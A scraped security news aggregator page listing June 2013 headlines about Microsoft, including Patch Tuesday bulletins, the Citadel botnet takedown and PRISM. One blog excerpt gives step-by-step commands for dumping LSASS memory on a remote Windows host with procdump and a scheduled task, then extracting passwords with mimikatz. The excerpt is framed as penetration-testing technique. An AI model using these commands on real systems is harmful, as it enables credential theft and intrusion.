http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2013-06-18 14:43:21 - Help Net Security News : Microsoft has announced the release of version 40 of its popular Enhanced Mitigation Experience Toolkit EMET , a free utility that helps prevent memory corruption vulnerabilities in software from be http://www.secuobs.com/revue/news/452060.shtmlhttp://www.secuobs.com/revue/news/452060.shtml 2013-06-17 15:40:00 - Help Net Security News : The disclosure of details about the controversial PRISM program set up by the NSA has indubitably damaged the reputation of the companies involved in it, and some of them are naturally trying to rebui http://www.secuobs.com/revue/news/451857.shtmlhttp://www.secuobs.com/revue/news/451857.shtml 2013-06-17 06:42:24 - Slashdot Your Rights Online : McGruber writes The NY Times has the news that federal judge Thomas Penfield Jackson, who ruled in 2000 that Microsoft was a predatory monopoly and must be split in half, has died He was 76 years old 'A technological novice who wrote his opinions in longhand and used his computer mainly to e-mail jokes, Judge Jackson refuted Microsoft's assertion that it was impossible to remove the company's Internet Explorer Web browser from its operating system by doing it himself When a Microsoft lawyer complained that too many excerpts from Bill Gates's videotaped deposition liberally punctuated with the phrase I don't remember were shown in the courtroom, Judge Jackson said, I think the problem is with your witness, not the way his testimony is being presented ' IMAGE IMAGE Share on Google Read more of this story at Slashdot IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/451783.shtmlhttp://www.secuobs.com/revue/news/451783.shtml 2013-06-16 14:01:08 - Network World on Security : Facebook and Microsoft each fielded thousands of requests for user data as part of law enforcement investigations from US authorities in the second half of last year, they said late Friday http://www.secuobs.com/revue/news/451730.shtmlhttp://www.secuobs.com/revue/news/451730.shtml 2013-06-16 01:26:12 - Slashdot Your Rights Online : wiredmikey writes Facebook and Microsoft say they received thousands of requests for information from US authorities last year but are prohibited from listing a separate tally for security-related requests or secret court orders related to terror probes The two companies have come under heightened scrutiny since reports leaked of a vast secret Internet surveillance program US authorities insist targets only foreign terror suspects and is needed to prevent attacks Facebook said Friday it had received between 9,000 and 10,000 requests for user data affecting 18,000 to 19,000 accounts during the second half of last year and Microsoft said it had received 6,000 to 7,000 requests affecting 31,000 to 32,000 accounts during the same period Meanwhile, an article at the Guardian is suggesting the government may have better targets to pursue than Edward Snowden US director of national intelligence James Clapper has come out vocally to condemn Snowden as a traitor to the public interest and the country, yet a review of Booz Allen's own history suggests that the government should be investigating his former employer, rather than the whistleblower IMAGE IMAGE Share on Google Read more of this story at Slashdot IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/451690.shtmlhttp://www.secuobs.com/revue/news/451690.shtml 2013-06-15 18:32:07 - Tout sur la cybersécurité la cyberdéfense ... : Pour que les ordinateurs du gouvernement US aient une longueur d avance, Microsoft informe en premier lieu les agences américaines de vulnérabilités de sécurité 0-day dans ses logiciels avant de diffuser publiquement des correctifs Aussi pour aider au cyberespionnage En savoir plus http://www.secuobs.com/revue/news/451642.shtmlhttp://www.secuobs.com/revue/news/451642.shtml 2013-06-14 19:12:47 - Ars Technica Risk Assessment : Meant to help secure network, data could be used to attack foreign governments http://www.secuobs.com/revue/news/451513.shtmlhttp://www.secuobs.com/revue/news/451513.shtml 2013-06-14 07:40:27 - adafruit industries blog : Visual Pi brings drag-and-drop NET Control for the Raspberry Pi VisualPi is a Drag and Drop NET Control for Raspberry Pi, with GPIO and Media functions VisualPi Features Control Raspberry Pi over your home network with Visual Studio The VisualPi form control provides real time feedback on state of GPIO ports Uses familiar NET syntax http://www.secuobs.com/revue/news/451387.shtmlhttp://www.secuobs.com/revue/news/451387.shtml 2013-06-14 02:46:52 - Symantec Connect Security Response Billets : The time between discovery of a vulnerability and the emergence of an exploit keeps getting shorter sometimes a matter of only hours This increases pressure on IT managers to rapidly patch production systems in conflict with configuration management and best practices for quality assurance Many organizations struggle to keep up with the constant release of new patches and updates Last Tuesday, June 11, 2013, Microsoft released a security bulletin MS13-051 which covers a number of vulnerabilities One of the vulnerabilities has reportedly been exploited in targeted attacks Attackers can leverage this vulnerability by sending a specially crafted attachment as part of a spear phishing campaign Microsoft Office PNG File CVE-2013-1331 Buffer Overflow Vulnerability CVE-2013-1331 a remote stack-based buffer overflow vulnerability in Microsoft Office that allows remote code execution It is confirmed to affect Microsoft Office 2011 for Mac and Microsoft Office 2003 for all Windows platforms Symantec currently has the following detections in place for this vulnerability Antivirus Signature TrojanMdropper Intrusion Prevention Signature Web Attack Microsoft Office CVE-2013-1331 2 System Infected Trojan Backdoor Activity 12 We continue to monitor this threat to improve coverage and will provide any relevant updates when possible Symantec strongly advise users to update their antivirus definitions regularly and ensure the latest Microsoft patches are installed Update for Office 2003 Update for Office for Mac 2011 http://www.secuobs.com/revue/news/451361.shtmlhttp://www.secuobs.com/revue/news/451361.shtml 2013-06-13 22:06:35 - Global Security Mag Online : La nouvelle étude Microsoft réalisée par l'institut comScore mars avril 2013 , révèle qu'en plus de bénéficier d'économies de temps et d'argent, les PME françaises dans le Cloud gagnent en sécurité, en confidentialité et fiabilité notamment par rapport aux entreprises qui hésitent encore à adopter l'informatique dans le nuage L'étude montre qu'entre les préjugés des réfractaires et l'expérience des utilisateurs, les perceptions relatives au Cloud sont synonymes de visions contrastées Il existe un fossé - Investigations http://www.secuobs.com/revue/news/451327.shtmlhttp://www.secuobs.com/revue/news/451327.shtml 2013-06-13 20:23:43 - Network World on Security : Microsoft is upping the security on Azure with Active Authentication, a new service now in preview which allows enterprises to secure access to hosted applications such as Office 365 with two-factor authentication http://www.secuobs.com/revue/news/451304.shtmlhttp://www.secuobs.com/revue/news/451304.shtml 2013-06-13 14:37:45 - ZDNet Zero Day Blog RSS : Despite rolling out five security updates, Microsoft missed out a patch for a zero-day flaw in Windows And it just so happened it was discovered by its main rival in the business space IMAGE http://www.secuobs.com/revue/news/451227.shtmlhttp://www.secuobs.com/revue/news/451227.shtml 2013-06-13 14:17:02 - Global Security Mag Online : Exceliance convie à un petit déjeuner - parole d'expert sur le thème de la haute disponibilité des applications ou comment garantir de meilleures performances et la disponibilité des applications grâce à l'ALOHA Load Balancer d'Exceliance Durant cette matinée, vous découvrirez nos solutions certifiées par Microsoft et les autres bénéfices qu'offre l'ALOHA Load Balancer pour Réguler les flux applicatifs, Fiabiliser et améliorer, la disponibilité et la performance de vos services en ligne, Protéger - Événements http://www.secuobs.com/revue/news/451216.shtmlhttp://www.secuobs.com/revue/news/451216.shtml 2013-06-12 19:52:38 - Vigilance vulnérabilités publiques : Un attaquant distant peut employer quatre vulnérabilités de Microsoft SharePoint Server 2010, afin d'élever ses privilèges http://www.secuobs.com/revue/news/451057.shtmlhttp://www.secuobs.com/revue/news/451057.shtml 2013-06-12 18:10:19 - Les derniers documents du CERTA. : De multiples vulnérabilités ont été corrigées dans Microsoft Internet Explorer Elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance http://www.secuobs.com/revue/news/450997.shtmlhttp://www.secuobs.com/revue/news/450997.shtml 2013-06-12 18:10:19 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans le noyau Microsoft Windows Elle permet à un attaquant de provoquer une atteinte à la confidentialité des données http://www.secuobs.com/revue/news/450996.shtmlhttp://www.secuobs.com/revue/news/450996.shtml 2013-06-12 18:10:19 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans le système TCP IP de Microsoft Windows Elle permet à un attaquant de provoquer un déni de service à distance http://www.secuobs.com/revue/news/450995.shtmlhttp://www.secuobs.com/revue/news/450995.shtml 2013-06-12 18:10:19 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans les composants du spouleur d'impression Microsoft Windows Elle permet à un attaquant de provoquer une élévation de privilèges http://www.secuobs.com/revue/news/450994.shtmlhttp://www.secuobs.com/revue/news/450994.shtml 2013-06-12 18:10:19 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft Office Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance http://www.secuobs.com/revue/news/450993.shtmlhttp://www.secuobs.com/revue/news/450993.shtml 2013-06-12 16:04:51 - Security Bloggers Network : A posting from Naked Security As we mentioned last week, Microsoft recently fought back against more than 1,400 Citadel botnets by sinkholing their Command and Control C C infrastructure SophosLabs has been monitoring Citadel for some time, including individual botnets such as those targeting Canadian institutions, so I decided to take a closer look at the impact of the takedown I took http://www.secuobs.com/revue/news/450973.shtmlhttp://www.secuobs.com/revue/news/450973.shtml 2013-06-12 13:23:54 - Network World on Security : A new batch of security updates released by Microsoft on Tuesday address a total of 23 vulnerabilities in Internet Explorer, Windows and Microsoft Office, including one that is actively exploited by attackers The handling of digital certificates in Windows was also improved http://www.secuobs.com/revue/news/450940.shtmlhttp://www.secuobs.com/revue/news/450940.shtml 2013-06-12 00:18:18 - Symantec Connect Security Response Billets : Hello, welcome to this month's blog on the Microsoft patch release This month the vendor is releasing five bulletins covering a total of 23 vulnerabilities Nineteen of this month's issues are rated Critical As always, customers are advised to follow these security best practices Install vendor patches as soon as they are available Run all software with the least privileges required while still maintaining functionality Avoid handling files from unknown or questionable sources Never visit sites of unknown or questionable integrity Block external access at the network perimeter to all key systems unless specific access is required Microsoft's summary of the June releases can be found here http technetmicrosoftcom en-us security bulletin ms13-Jun The following is a breakdown of the issues being addressed this month 1 MS13-047 Cumulative Security Update for Internet Explorer 2838727 Internet Explorer Memory Corruption Vulnerability CVE-2013-3110 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3111 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3112 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3113 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3114 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3116 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3117 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3118 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3119 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3120 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3121 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3122 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3123 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Use After Free Vulnerability CVE-2013-3124 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Use After Free Vulnerability CVE-2013-3125 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Script Debug Vulnerability CVE-2013-3126 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly processes script while debugging a webpage The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website Internet Explorer Memory Corruption Vulnerability CVE-2013-3139 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3141 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user Internet Explorer Memory Corruption Vulnerability CVE-2013-3142 MS Rating Critical A remote code execution vulnerability exists when Internet Explorer improperly accesses an object in memory This vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user 2 MS13-048 Vulnerability in Windows Kernel Could Allow Information Disclosure 2839229 Kernel Information Disclosure Vulnerability CVE-2013-3136 MS Rating Important An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory An attacker who successfully exploited this vulnerability could disclose information from kernel addresses 3 MS13-049 Vulnerability in Kernel-Mode Driver Could Allow Denial of Service 2845690 TCP IP Integer Overflow Vulnerability CVE-2013-3138 MS Rating Important A denial of service vulnerability exists in the way that the Windows TCP IP driver improperly handles packets during TCP connection An attacker who successfully exploited this vulnerability could cause the target system to stop responding 4 MS13-050 Vulnerability in Windows Print Spooler Components Could Allow Elevation of Privilege 2839894 Print Spooler Vulnerability CVE-2013-1339 MS Rating Important An elevation of privilege vulnerability exists in the way that Microsoft Windows Print Spooler handles memory when a printer is deleted 5 MS13-051 Vulnerability in Microsoft Office Could Allow Remote Code Execution 2839571 Office Buffer Overflow Vulnerability CVE-2013-1331 MS Rating Important A remote code execution vulnerability exists in the way that Microsoft Office parses specially crafted Office files An attacker who successfully exploited this vulnerability could take complete control of an affected system An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights More information on the vulnerabilities being addressed this month is available at Symantec's free SecurityFocus portal and to our customers through the DeepSight Threat Management System http://www.secuobs.com/revue/news/450864.shtmlhttp://www.secuobs.com/revue/news/450864.shtml 2013-06-12 00:07:08 - Dark Reading All Stories : Survey finds SMBs afraid of going cloud for security reasons and SMBs loving the cloud for security reasons http://www.secuobs.com/revue/news/450863.shtmlhttp://www.secuobs.com/revue/news/450863.shtml 2013-06-11 23:40:56 - Security Bloggers Network : Patch Tuesday is again upon us Adobe today issued updates for Flash Player and AIR, fixing the same critical vulnerability in both products Microsoft's patch bundle of five updates addresses 23 vulnerabilities in Windows, Internet Explorer, and Office, including one bug that is already being actively exploited http://www.secuobs.com/revue/news/450860.shtmlhttp://www.secuobs.com/revue/news/450860.shtml 2013-06-11 22:51:31 - Security Bloggers Network : Another month brings us another Update Tuesday This month is pretty light with respect to the updates that Microsoft is releasing They're releasing a total of 5 bulletins, covering 23 CVEsFirst and foremost are the critical updates for Internet Expl http://www.secuobs.com/revue/news/450849.shtmlhttp://www.secuobs.com/revue/news/450849.shtml 2013-06-11 21:09:23 - Security Bloggers Network : Finally, patch Tuesday has arrived and fortunately this one will be a real treat This release should be a breeze with only five 5 bulletins, which only one of these being critical Some of these bulletins might not affect you if you are running a Windows 64-bit system such as MS13-048 or running an unaffected version of Microsoft Office MS13-051 So I'm expecting the update process will go fairly quickly, so no need to wait to perform these security updates before bed time or during lunch But of-course there is no guarantees However, I would 'Just do it' as the http://www.secuobs.com/revue/news/450825.shtmlhttp://www.secuobs.com/revue/news/450825.shtml 2013-06-11 21:08:42 - Help Net Security News : For Patch Tuesday this month, we are receiving critical updates from both Microsoft and Adobe Microsoft has five bulletins, bringing the six-month total up to 51 bulletins, about 20pourcents more than we had http://www.secuobs.com/revue/news/450820.shtmlhttp://www.secuobs.com/revue/news/450820.shtml 2013-06-11 20:17:49 - SANS Internet Storm Center InfoCON green : Microsoft http://www.secuobs.com/revue/news/450815.shtmlhttp://www.secuobs.com/revue/news/450815.shtml 2013-06-11 19:24:34 - SANS Internet Storm Center InfoCON green : Overview of the http://www.secuobs.com/revue/news/450787.shtmlhttp://www.secuobs.com/revue/news/450787.shtml 2013-06-10 12:37:27 - Help Net Security News : Last week's disruption of nearly 1500 Citadel botnets believed to be responsible for over half a billion US dollars in financial fraud and affecting more than five million people in 90 countries has b http://www.secuobs.com/revue/news/450432.shtmlhttp://www.secuobs.com/revue/news/450432.shtml 2013-06-10 05:28:52 - Fortinet Blog News and Threat Research All Posts : Late last week, Microsoft s Digital Crimes Unit, working with the FBI and the US courts, took a huge chunk out of the capabilities of the Citadel botnet Citadel is a ZeuS variant that is responsible for infecting what is believed to be millions of computers across the globe in the hopes of stealing financial information through key logging and form grabbing and using that information to steal money from the bank accounts of infected victims This latest takedown, known as Operation http://www.secuobs.com/revue/news/450354.shtmlhttp://www.secuobs.com/revue/news/450354.shtml 2013-06-10 00:13:11 - Security Bloggers Network : Patch Tuesday is coming on 11 June 2013 Paul Ducklin gives you a quick preview of what we know so far, and who'll be affected by the updates Mac users, that might include you http://www.secuobs.com/revue/news/450328.shtmlhttp://www.secuobs.com/revue/news/450328.shtml 2013-06-08 20:48:56 - Tout sur la cybersécurité la cyberdéfense ... : L Agence nationale de sécurité américaine NSA et le FBI ont accès aux serveurs de neuf géants américains de l internet, dont Microsoft, Yahoo , Google et Facebook, ont révélé le Washington Post et le Guardian jeudi Elle peut y surveiller les activités d étrangers Les groupes informatiques concernés démentent Le quotidien américain Washington Post a été contacté par http://www.secuobs.com/revue/news/450239.shtmlhttp://www.secuobs.com/revue/news/450239.shtml 2013-06-07 18:07:39 - Security Bloggers Network : Mimikatz is now built into Metasploit's meterpreter, you can do load mimikatz from the meterpreter prompt, but if you don't want to go through the hassle of dealing with AV, reverse or bind payloads, meterpreter binaries, and you have clear text credentials for an admin, you can just use Mimikatz's alpha release that allows you to run Mimikatz on your machine against a process memory dump of LSASS The great thing about this technique is that the only thing on disk is a Microsoft tool Mimikatz Minidump http bloggentilkiwicom securite mimikatz minidump Procdump http technetmicrosoftcom en-us sysinternals dd996900aspx Lets start First we make sure our authentication works against the box and we can look inside of C usually only admins can net use TARGETBOX C user DOMAIN serviceaccount serviceaccount123 dir TARGETBOX C If that works then we want to check that we can all the AT command on the remote host at TARGETBOX All set Next lets prep our workspace on the remote host We are using the C Temp directory mkdir TARGETBOX C Temp dir TARGETBOX C Temp copy c temp procdumpexe TARGETBOX C copy c temp procdumpbat TARGETBOX C The contents of procdumpbat are echo off C temp procdumpexe -accepteula -ma lsassexe pourcentsCOMPUTERNAMEpourcents_lsassdmp I'm using the computer name in the memory dump name to help me keep track of where the dump came from, but also help me notice when I've dumped more than one IP that is actually the same host Next we schedule the task Use net time to determine the local time for the remote machine net time TARGETBOX at TARGETBOX 13 52 C Temp procdumpbat Pull down the file and clean up dir TARGETBOX C Temp copy TARGETBOX C Temp lsassdmp C temp output rmdir s TARGETBOX C Temp On your side the only thing you need to make sure is that you are running Mimikatz on a similar version and architecture you pulled from Use the following url for reference http bloggentilkiwicom wp-content uploads 2013 04 minidump_matrixpng Load up the Alpha version of Mimikatz, switch it to minidump mode and you're dumping creds mimikatz sekurlsa minidump SUPERCOMPUTER_lsassdmp Switch to MINIDUMP mimikatz sekurlsa logonPasswords full Thats it Password dumping without ever using a Hacker tool on target Much love Microsoft And even more to Mimikatz creator gentilkiwi - Benjamin Delpy for both this alpha release and changing his licensing to allow Mimikatz code to be integrated into Meterpreter IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/450078.shtmlhttp://www.secuobs.com/revue/news/450078.shtml 2013-06-07 14:54:57 - ZDNet Zero Day Blog RSS : In June's upcoming Patch Tuesday, the software giant has only one critical flaw up its sleeve, with the remaining four rated important IMAGE http://www.secuobs.com/revue/news/450049.shtmlhttp://www.secuobs.com/revue/news/450049.shtml 2013-06-07 11:35:48 - Tout sur la cybersécurité la cyberdéfense ... : Microsoft et le FBI ont lancé, avec le soutien de plus de 80 pays, une offensive contre l un des plus importants réseaux informatiques de cybercriminalité au monde Ce réseau est soupçonné d avoir volé près de 400 millions d euros 493 millions de francs sur des comptes bancaires à travers le monde Les réseaux botnets Citadel ont http://www.secuobs.com/revue/news/449996.shtmlhttp://www.secuobs.com/revue/news/449996.shtml 2013-06-07 07:43:55 - Help Net Security News : Microsoft released advance notification for next week s Microsoft patch and it looks like we're getting only five bulletins We received several comments on what we can expect on Tuesday Ross Ba http://www.secuobs.com/revue/news/449965.shtmlhttp://www.secuobs.com/revue/news/449965.shtml 2013-06-07 01:30:02 - Security Bloggers Network : Microsoft just announced the successful disruption of 1462 Citadel botnets You read that correctly Not a botnet of 1462 computers, but 1462 separate botnets http://www.secuobs.com/revue/news/449938.shtmlhttp://www.secuobs.com/revue/news/449938.shtml 2013-06-07 00:42:25 - Security Bloggers Network : So far this year we has had two Patch Tuesday months with seven bulletins January and March and two with ten bulletins April and May and one with twelve February so I am very glad that we only have five bulletins this month That gives us all more time to go out and enjoy the summer weather Although just because there is only five bulletins this month doesn t mean we shouldn t pay attention to them First if you are planning ahead note that four of these bulletins will require a restart after installing and the fifth one might, probably depending http://www.secuobs.com/revue/news/449932.shtmlhttp://www.secuobs.com/revue/news/449932.shtml 2013-06-06 23:51:43 - Ars Technica Risk Assessment : Massive online fraud syndicate that targeted online bank accounts disrupted http://www.secuobs.com/revue/news/449919.shtmlhttp://www.secuobs.com/revue/news/449919.shtml 2013-06-06 21:01:01 - Dark Reading All Stories : The feds says Citadel is responsible for more than 500 million in losses worldwide http://www.secuobs.com/revue/news/449896.shtmlhttp://www.secuobs.com/revue/news/449896.shtml 2013-06-06 19:45:42 - Security Bloggers Network : Microsoft and the FBI have carried out a major operation against cybercriminals using Citadel malware, saying they disrupted more than 1,000 botnets responsible for about 500 million in financial fraud globally In separate releases issued on Wednesday June 5 , the software giant and the FBI said they had worked with leaders of the financial services industry in acting against a Read more IMAGE http://www.secuobs.com/revue/news/449857.shtmlhttp://www.secuobs.com/revue/news/449857.shtml 2013-06-06 19:36:44 - HACKMIAMI : The FBI and Microsoft have broken up a huge network of hijacked home computers responsible for stealing more than 500m 323m from bank accounts The Citadel network had remotely installed a keylogging program on about five million machines to steal data About 1,000 of the 1,400 or so networks that made up the Citadel botnet http://www.secuobs.com/revue/news/449851.shtmlhttp://www.secuobs.com/revue/news/449851.shtml 2013-06-06 13:39:44 - Network World on Security : Microsoft and the US Federal Bureau of Investigation have taken aim at a botnet network based on malware called Citadel that is held responsible for stealing people's online banking information and personal identities http://www.secuobs.com/revue/news/449787.shtmlhttp://www.secuobs.com/revue/news/449787.shtml 2013-06-06 12:13:07 - Help Net Security News : Microsoft, the FBI, Agari, financial services industry leaders FS-ISAC, NACHA, and other industry partners, managed to break up a massive cybercrime ring which was stealing people s online banking inf http://www.secuobs.com/revue/news/449761.shtmlhttp://www.secuobs.com/revue/news/449761.shtml 2013-06-06 09:48:19 - ZDNet Zero Day Blog RSS : The Redmond giant says it has successfully disrupted a harmful network of botnets IMAGE http://www.secuobs.com/revue/news/449738.shtmlhttp://www.secuobs.com/revue/news/449738.shtml 2013-06-06 02:45:05 - Security Bloggers Network : After resisting for over 3 years, F5 Technical Director Ryan Korock finally joins me on camera to discuss the new NVGRE solution This new solution along with F5 s broader solution set aims to help customers assure reliable performance regardless of how individual organizations choose to architect their systems Through integration with Microsoft s System Center 2012 Virtual Machine http://www.secuobs.com/revue/news/449696.shtmlhttp://www.secuobs.com/revue/news/449696.shtml 2013-06-05 21:53:52 - Channel 9 : Cloud computing models are changing the technology landscape and providing more opportunity than ever for IT to deliver impact to the business This Foundational Session will dive into the new Microsoft datacenter technologies and demonstrate how you can be the best provider of technology for your organization Learn how Windows Server, System Center, Windows Azure, and other new technologies work together to help you provision and manage cloud and datacenter infrastructure, provide business continuity, deliver services, and manage applications This includes breakthrough capabilities in the areas of storage, networking, virtualization, management, and automation You will also learn how the latest innovations bring together on-premises approaches and cloud-based technologies to deliver hybrid cloud solutions leveraging your existing resources IMAGE http://www.secuobs.com/revue/news/449655.shtmlhttp://www.secuobs.com/revue/news/449655.shtml 2013-06-05 05:36:17 - SANS Internet Storm Center InfoCON green : more http://www.secuobs.com/revue/news/449409.shtmlhttp://www.secuobs.com/revue/news/449409.shtml 2013-06-04 20:28:54 - Security Bloggers Network : Peter Colsted will work to further strengthen Secunia's international position http://www.secuobs.com/revue/news/449331.shtmlhttp://www.secuobs.com/revue/news/449331.shtml 2013-06-04 19:16:25 - Dark Reading All Stories : Peter Colsted will work to further strengthen Secunia's international position http://www.secuobs.com/revue/news/449319.shtmlhttp://www.secuobs.com/revue/news/449319.shtml 2013-06-04 15:03:11 - CERT Announcements : This blog post describes the risks of using Microsoft Exchange features that use Oracle Outside In and what you can do about it http://www.secuobs.com/revue/news/449249.shtmlhttp://www.secuobs.com/revue/news/449249.shtml 2013-06-04 13:46:27 - Security Bloggers Network : ICYMI yesterday's ITBW Computerworld originally shared this post Microsoft CIO out bloggers ask if he jumped or was pushed http blogscomputerworldcom windows 22277 microsoft-cio-out-tony-scotts-dogfood-days-done-itbwcw source cwfb courtesy of our humble blogwatcher, Richi Jennings attached image IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/449234.shtmlhttp://www.secuobs.com/revue/news/449234.shtml 2013-06-03 19:55:14 - Security Bloggers Network : Today s senior executives rely on information technology organizations to help their business execute on strategies and improve their operations As the bedrock for the corporate directory and identity, the Active Directory plays a critical role http://www.secuobs.com/revue/news/449090.shtmlhttp://www.secuobs.com/revue/news/449090.shtml 2013-06-03 14:38:34 - Security Bloggers Network : Microsoft CIO out Tony Scott's dogfood days done You're fired -Ed Microsoft NASDAQ MSFT CIO, Tony Scott, has left the company, after five years in the job Microsofties Thank him and wish him well In IT Blogwatch, bloggers ask if he jumped or was pushed today's ITBW for Computerworld MSFT Microsoft CIO out Tony Scott's dogfood days done attached image IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/449026.shtmlhttp://www.secuobs.com/revue/news/449026.shtml 2013-05-30 19:54:45 - Network World on Security : In a move designed to starve botnets where they live, Microsoft launched a program on Tuesday to plug its security intelligence systems into its global cloud, Azure http://www.secuobs.com/revue/news/448630.shtmlhttp://www.secuobs.com/revue/news/448630.shtml 2013-05-30 17:49:48 - Vigilance vulnérabilités publiques : Un attaquant peut provoquer un Cross Site Scripting dans la Configuration Console de McAfee Security for Microsoft Exchange, afin d'exécuter du code JavaScript dans le contexte du site web http://www.secuobs.com/revue/news/448584.shtmlhttp://www.secuobs.com/revue/news/448584.shtml 2013-05-30 15:27:20 - Network World on Security : Microsoft said Tuesday that it has moved its botnet-fighting capabilities to the cloud, a step that will make its response teams both faster and more effective in fighting hijacked PCs http://www.secuobs.com/revue/news/448561.shtmlhttp://www.secuobs.com/revue/news/448561.shtml 2013-05-30 14:01:47 - Help Net Security News : Dell Software announced a series of new enhancements designed to help organizations optimize the migration, management and monitoring of Microsoft environments Dell Software is releasing a host http://www.secuobs.com/revue/news/448532.shtmlhttp://www.secuobs.com/revue/news/448532.shtml 2013-05-30 08:33:48 - Vigilance vulnérabilités publiques : Un attaquant peut inviter la victime à ouvrir un fichier illicite avec Microsoft Visio, afin de le forcer à inclure un fichier, qui peut ensuite être retourné à l'attaquant http://www.secuobs.com/revue/news/448484.shtmlhttp://www.secuobs.com/revue/news/448484.shtml 2013-05-30 00:36:58 - CNIS mag : Le mardi des rustines de ce mois de mai ne compte que 10 correctifs dans lesquels sont rectifiées 33 vulnérabilités de taille 24 risques d exploitation à distance, 3 élévations de privilège, 3 fuites d information, un DoS, un spoofing et un contournement d authentification Une collection digne d un mois pair Il est recommandé d installer en priorité http://www.secuobs.com/revue/news/448435.shtmlhttp://www.secuobs.com/revue/news/448435.shtml 2013-05-29 21:09:36 - Vigilance vulnérabilités publiques : Un attaquant peut inviter la victime à ouvrir un fichier illicite avec Publisher, afin de faire exécuter du code sur son ordinateur http://www.secuobs.com/revue/news/448388.shtmlhttp://www.secuobs.com/revue/news/448388.shtml 2013-05-28 23:46:30 - Channel 9 : Enjoy this fun filled 90 minutes where Senior Technical Evangelist Symon Perriman and Principal Program Manager Jeff Woolsey answer questions from the audience on Microsoft's approach to virtualization This session was based on a series of three virtualization Jump Starts delivered earlier this year Introduction to Microsoft Virtualization Microsoft Virtualization for VMware Professionals and Microsoft Tools for VMware Integration Migration 11 50 - What's new in Hyper-V Server 2012 16 01 - What's the free Hyper-V Server 26 40 - What's new in networking 44 45 - Windows Server 2012 Hyper-V storage 55 58 - Using pass-through disks 1 05 20 - Live migration 1 15 32 - Multi-site clusters 1 19 20 - Hyper-V replica demo 1 28 14 - Cluster-aware updating IMAGE http://www.secuobs.com/revue/news/448180.shtmlhttp://www.secuobs.com/revue/news/448180.shtml 2013-05-28 22:56:21 - Security Bloggers Network : Europe Says Google's Promises Are Not Enough As Microsoft Silently Cheers The European Union has all-but decided to reject Google s anti-trust proposals The almost three-year investigation was prompted by Microsoft and friends It led to Google offering to change the way it does business, in order to avoid a fine that could run into billions of dollars On the one hand, if the FTC recently rejected some mightily-similar claims, it s a 